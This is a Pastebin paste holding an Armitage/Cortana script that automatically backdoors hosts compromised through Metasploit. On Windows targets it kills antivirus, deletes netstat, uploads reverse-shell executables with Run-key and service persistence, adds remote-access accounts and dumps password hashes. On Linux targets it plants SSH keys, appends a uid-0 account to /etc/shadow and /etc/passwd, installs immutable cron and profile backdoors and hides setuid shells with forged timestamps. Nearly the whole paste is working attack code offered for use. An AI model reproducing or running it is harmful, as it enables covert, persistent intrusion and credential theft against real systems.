Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Script to install/hide a few shells/accounts
- # To Do
- # Check for root
- # Encode payloads
- # Filter bad addresses on load
- # Add dns server
- # add infolinkd.dll
- # Update hosts file with fake entries to break patching (evil grade?)
- # Author: __int128
- global('%infected');
- $addresses = @();
- $win_user = 'lls_USER';
- $win_pass = '@pplesauc3';
- $local_ip = lhost();
- @alphabet = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
- on ready {
- on console_ifconfig {
- @addresses = split("\n", $3);
- }
- cmd_async('ifconfig | grep "inet addr" | cut -d ":" -f 2 | cut -d " " -f 1');
- }
- on session_open {
- $rhost = session_host($1);
- if (%infected[session_host($1)] != "1") {
- if (host_os(session_host($1)) eq "Microsoft Windows") {
- if(-isshell $1) {
- cmd_async("sessions -u $1");
- }
- if(-iswinmeterpreter $1) {
- say("Infecting " . session_host($1));
- %infected[session_host($1)] = "1";
- m_cmd($1, "getsystem");
- m_cmd($1, "run killav");
- m_cmd($1, "run metsvc");
- # delete netstat
- m_cmd($1, "del c:\\Windows\\System32\\netstat.exe");
- # Generate Payload(s)
- $r_lport_a = random_port();
- $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
- $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
- createNewFile("/tmp/$r_name");
- foreach $address (@addresses) {
- # Validate its an address
- if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
- # Filter out unwanted addresses # should really be done above
- if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
- $raw = generate("windows/shell_reverse_tcp", $address, $r_lport_a, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
- # remove last two bytes of windows payload
- # Credit to HDMoore for the idea
- $raw = substr($raw, 0, strlen($raw)-2);
- $handle = openf(">>/tmp/$r_name");
- writeb($handle, $raw);
- closef($handle);
- }
- }
- }
- #deleteFile("/tmp/update.exe");
- exec("msfencode -i /tmp/$r_name -p windows -a x86 -e generic/none -t exe -o /tmp/$r_backdoor");
- #sleep so that the payload can be generated
- sleep((30 + rand(60)) * 1000);
- m_cd($1, 'c:\Windows\System32');
- m_upload($1, "/tmp/$r_backdoor");
- m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\$r_backdoor\"");
- foreach $address (@addresses) {
- if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
- $r_lport_b = random_port();
- m_cmd($1, "run persistence -X -i 60 -p $r_lport_b -r $address");
- handler("windows/meterpreter/reverse_tcp", $r_lport_b, %(LHOST => $address, ExitOnSession => "false"));
- }
- }
- m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
- m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
- $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";
- cmd_async($rdp);
- $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";
- cmd_async($tel);
- handler("windows/shell_reverse_tcp", $r_lport_a, %(LHOST => "0.0.0.0", ExitOnSession => "false", AutoRunScript => "spawn_meterpreter"));
- handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
- m_cmd($1, "run hashdump");
- say("Done Infecting " . session_host($1));
- }
- }
- else if (host_os(session_host($1)) eq "Linux") {
- if (-isshell $1) {
- say("Infecting " . session_host($1));
- %infected[session_host($1)] = "1";
- # Removing netstat
- s_cmd($1, "rm -rf /bin/netstat");
- s_cmd($1, "mkdir /root/.ssh");
- # on load prompt for keys or generate?
- $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
- $pub_key = readln($handle);
- s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
- closef($handle);
- s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
- s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
- $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
- cmd_async($ssh);
- # Generate Payload
- $r_lport = random_port();
- $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
- $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
- createNewFile("/tmp/$r_name");
- foreach $address (@addresses) {
- # Validate its an address
- if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
- # Filter out unwanted addresses # should really be done above
- if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
- $raw = generate("linux/x86/shell_reverse_tcp", $address, $r_lport, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
- $handle = openf(">>/tmp/$r_name");
- writeb($handle, $raw);
- closef($handle);
- }
- }
- }
- #deleteFile("/tmp/linux_backdoor");
- exec("msfencode -i /tmp/$r_name -p linux -a x86 -e generic/none -t elf -o /tmp/$r_backdoor");
- sleep ((30 + rand(60)) * 1000 );
- #deleteFile("/tmp/$r_name");
- # set cron job
- s_cmd($1, "mkdir /etc/cron.5min");
- s_cmd($1, "echo '*/15 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
- s_cmd($1, "echo '*/15 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
- s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
- shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
- s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")
- s_cmd($1, "chattr +i /etc/cron.5min/dpkg");
- # set profile
- shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
- s_cmd($1, "chmod 775 /usr/bin/ufw");
- s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
- s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
- s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");
- # Create Backup Shell
- s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
- s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");
- # Launch our aux shells
- handler("linux/x86/shell_reverse_tcp", $r_lport, %(LHOST => "0.0.0.0", ExitOnSession => "false"));
- auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
- login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
- # Get hashes
- launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
- db_sync();
- say("Done Infecting " . session_host($1));
- }
- }
- else {
- say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));
- }
- }
- else {
- if (host_os(session_host($1)) eq "Microsoft Windows") {
- if(-isshell $1) {
- # can not upgrade due to sessions binding to 0.0.0.0 and port already listening due to persistant listeners
- #cmd_async("sessions -u $1");
- }
- }
- }
- }
- popup host_bottom {
- $rhost = $1;
- if (%infected[$1] == "1") {
- item "Re-establish connection" {
- if (host_os($1) eq "Microsoft Windows") {
- handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
- }
- if (host_os($1) eq "Linux") {
- auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
- login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
- }
- }
- }
- }
Add Comment
Please, Sign In to add comment